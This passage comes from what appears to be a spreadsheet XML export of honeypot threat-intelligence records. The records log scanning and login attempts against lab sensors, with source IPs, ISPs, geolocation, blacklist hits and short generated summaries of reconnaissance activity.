    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1bff:8402"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1177"/>
    <x v="1177"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T10:11:54"/>
    <d v="2024-03-05T13:19:00"/>
    <d v="2025-04-21T10:11:54"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;44366&amp;&amp;1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="UZ"/>
    <s v="Uzbekistan"/>
    <s v="TK"/>
    <s v="Tashkent"/>
    <s v="NA"/>
    <s v="Tashkent (Shayxontohur tumani)"/>
    <s v="1512569"/>
    <s v="NA"/>
    <s v="41.3224"/>
    <s v="69.2482"/>
    <s v="8193"/>
    <s v="Uzbektelekom Joint Stock Company"/>
    <s v="Uzbektelecom JSC"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d5e6:5a1d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1178"/>
    <x v="1178"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T07:05:51"/>
    <d v="2025-02-25T11:53:35"/>
    <d v="2025-04-21T07:05:51"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. Telekomunikasi Indonesia"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2011-01-14"/>
    <s v="TLKM_BB_INF_36_64"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2440:6ae2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1179"/>
    <x v="1179"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T07:01:12"/>
    <d v="2025-04-21T07:01:12"/>
    <d v="2025-04-21T07:01:12"/>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d6:4b76"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning for open ports and services on the victim's system, attempting to identify potential vulnerabilities to exploit. They are also trying to establish unauthorized connections to various services such as FTP, HTTP, HTTPS, IMAP, POP3, and SMTP. &amp;&amp; The attackers are conducting reconnaissance and scanning activities, attempting to identify vulnerabilities in various systems and protocols. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting potential weaknesses."/>
    <s v="  &amp;&amp; Reconnaissance"/>
  </r>
  <r>
    <x v="1180"/>
    <x v="1180"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T06:50:40"/>
    <d v="2025-04-06T16:27:06"/>
    <d v="2025-04-21T06:50:40"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:f917"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1181"/>
    <x v="1181"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T06:20:21"/>
    <d v="2023-08-02T12:25:00"/>
    <d v="2025-04-21T06:20:21"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="15394&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam']}"/>
    <n v="42"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Dhaka (Lalbagh)"/>
    <s v="1185241"/>
    <s v="1000"/>
    <s v="23.717"/>
    <s v="90.3811"/>
    <s v="55828"/>
    <s v="Drik ICT Ltd"/>
    <s v="Drik ICT Ltd"/>
    <s v="business"/>
    <s v="Drik"/>
    <s v="2010-10-22"/>
    <s v="DRIK-BD"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79c8:3fa2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to recon and probe various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is likely scanning for vulnerabilities and testing authentication credentials."/>
    <s v=" Vulnerable System Scanning"/>
  </r>
  <r>
    <x v="1182"/>
    <x v="1182"/>
    <s v="NA&amp;&amp;syn-067-246-112-138.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-21T05:11:22"/>
    <d v="2025-04-05T21:06:37"/>
    <d v="2025-04-21T05:11:22"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Oswego"/>
    <s v="Fulton"/>
    <s v="5118136"/>
    <s v="13069"/>
    <s v="43.3228"/>
    <s v="-76.4172"/>
    <s v="11351"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:43f6:708a"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1183"/>
    <x v="1183"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T03:10:11"/>
    <d v="2025-03-08T21:24:33"/>
    <d v="2025-04-21T03:10:11"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;58660&amp;&amp;58822&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Sharq)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3759"/>
    <s v="47.9931"/>
    <s v="9155"/>
    <s v="Quality Net General Trading &amp; Contracting Company"/>
    <s v="QualityNet Kuwait"/>
    <s v="residential"/>
    <s v="Qualitynet Co."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3e96:90c2"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The attackers are scanning and probing various services on a network, likely for vulnerabilities or to gather information. They are using different protocols such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET."/>
    <s v=" "/>
  </r>
  <r>
    <x v="1184"/>
    <x v="1184"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T02:28:14"/>
    <d v="2025-04-21T02:02:07"/>
    <d v="2025-04-21T02:28:14"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Limda Chowk)"/>
    <s v="1258847"/>
    <s v="360002"/>
    <s v="22.2964"/>
    <s v="70.7984"/>
    <s v="136303"/>
    <s v="Sher Telelink Pvt Ltd"/>
    <s v="Sher Telelink Pvt Ltd"/>
    <s v="business"/>
    <s v="Sher Telelink Pvt Ltd"/>
    <s v="2017-05-03"/>
    <s v="SHERTELELINK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675b:df53"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is likely conducting a reconnaissance activity, gathering information about the available services and their configurations on the target network. They are attempting to identify potential vulnerabilities and entry points for further exploitation. &amp;&amp; Here is the analysis of the possible malicious activity:"/>
    <s v="Port scanning and enumeration of various services such as FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and TELNET. &amp;&amp; The attackers are scanning for open ports and services, attempting to exploit them with various credentials and attacks. They are trying to gain unauthorized access to systems, using protocols such as FTP, HTTP, HTTPS, IMAP, POP3, SMB, SMTP, SNMP, and others. The attackers are also probing for weak passwords and exploiting vulnerabilities in systems."/>
  </r>
  <r>
    <x v="1185"/>
    <x v="1185"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T02:12:43"/>
    <d v="2025-02-12T04:47:48"/>
    <d v="2025-04-21T02:12:43"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="D"/>
    <s v="Khulna Division"/>
    <s v="Khulna"/>
    <s v="Khulna"/>
    <s v="1336135"/>
    <s v="NA"/>
    <s v="22.8098"/>
    <s v="89.5644"/>
    <s v="137541"/>
    <s v="Royalnet"/>
    <s v="Royalnet"/>
    <s v="business"/>
    <s v="Royalnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6770:960c"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1186"/>
    <x v="1186"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T22:10:23"/>
    <d v="2024-12-02T15:33:59"/>
    <d v="2025-04-20T22:10:23"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;3546&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Franco da Rocha"/>
    <s v="Franco da Rocha"/>
    <s v="3462964"/>
    <s v="NA"/>
    <s v="-23.3217"/>
    <s v="-46.7269"/>
    <s v="270282"/>
    <s v="SIMONE BARBOSA DO NASCIMENTO SOUZA COMUNICAÇÃO"/>
    <s v="SIMONE BARBOSA DO NASCIMENTO SOUZA COMUNICAÇÃO"/>
    <s v="business"/>
    <s v="SIMONE BARBOSA DO NASCIMENTO SOUZA COMUNICAÇÃO"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c947:665"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1187"/>
    <x v="1187"/>
    <s v="122-117-95-118.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-20T21:11:18"/>
    <d v="2024-04-15T13:03:54"/>
    <d v="2025-04-20T21:11:18"/>
    <n v="207"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;54459&amp;&amp;52334&amp;&amp;55350"/>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NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:5f76"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1188"/>
    <x v="1188"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T21:10:59"/>
    <d v="2025-03-31T12:31:12"/>
    <d v="2025-04-20T21:10:59"/>
    <n v="396"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="Sydney"/>
    <s v="Sydney"/>
    <s v="2147714"/>
    <s v="2000"/>
    <s v="-33.8748"/>
    <s v="151.207"/>
    <s v="38333"/>
    <s v="Symbio Networks Pty Ltd"/>
    <s v="Telcoinabox Australia"/>
    <s v="residential"/>
    <s v="Telcoinabox Operations Pty Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_SMB:Incoming connection (180.222.175.86,59132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (angel,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60803)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61993)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63190)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64359)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49193)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50418)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51557)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52781)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53982)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55138)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56318)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57512)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58676)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59936)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61126)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,62274)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63473)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49435)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50632)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51804)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52983)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,62875)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64047)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,65252)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50091)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52456)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59564)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60763)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61903)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63118)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64328)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,65491)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50301)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51503)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49718)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dusko,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dusko,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49992)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50135)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 